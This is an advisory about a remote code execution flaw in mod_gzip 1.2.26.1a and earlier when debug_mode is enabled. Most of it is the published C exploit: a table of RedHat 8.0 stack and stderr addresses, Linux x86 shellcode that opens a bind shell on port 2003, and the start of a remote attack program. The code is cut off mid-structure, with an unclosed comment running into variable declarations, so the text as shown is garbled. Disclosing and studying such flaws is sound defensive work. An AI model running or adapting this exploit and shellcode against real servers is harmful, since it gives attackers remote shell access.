As we reported in our previous advisory: Multiple Vulnerabilities in mod_gzip Debugging Routines, a vulnerability in mod_gzip allows remote attackers to cause the program to execute arbitrary code if the debug_mode option has been enabled in mod_gzip.
Credit:
The information has been provided by xCrZx.
Vulnerable systems:
* mod_gzip version 1.2.26.1a and prior with debug_mode enabled
Exploit:
/*
\ [exploit code] for mod_gzip (with debug_mode) <= 1.2.26.1a
/
\ Created by xCrZx crazy_einstein yahoo com /05.06.03/
/
\ Tested on RedHat 8.0 (Psyche) (here is target for it),
/ also tested on FreeBSD 4.7 (1.3.19.2a) (here is no target for it :)
/
\
*/
struct TARGETS {
char *distr;
long ret;
long std_err;
char *shellcode;
char *jmp;
} targets[] = {
/* you can add targets here */
{"RedHat 8.0 (Psyche)", // disributive info
0xbfffd8f0, // return address in stack
0x42127480, // address of stderr
//shellcode for Linux x86 -> bind shell on 2003 port//
"\x31\xc0\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x8d\x43\x01\xcd\x80"
"\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08\x8d\x4d"
"\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x14\x66\xc7\x45\x16"
"\x07\xd3\x31\xd2\x89\x55\x18\x8d\x55\x14\x89\x55\x0c\xc6\x45\x10\x10"
"\xb0\x66\xcd\x80\x40\x89\x45\x0c\x43\x43\xb0\x66\xcd\x80\x43\x89\x45"
"\x0c\x89\x45\x10\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41"
"\x80\xf9\x03\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80",
/*
special jump instruction (to avoid bad characters in url):
(jump on our shellcode into heap)
int i=0;
struct sockaddr_in sockstruct;
struct hostent *HOST;
char tmp[20000];
char buf1[5000],buf2[10000];
int sock;
fd_set rset;
int port=80,shellport=2003;
int step=STEP;
char *victim=NULL;
long ret=0xbfffffff,ret_err;
int brutemode=0;
char *shellcode,*jmp;
int trg=0;
printf("\nremote exploit for mod_gzip (debug_mode) [Linux/*BSD]\n\t\t by xCrZx [crazy_einstein] /05.06.03/\n");
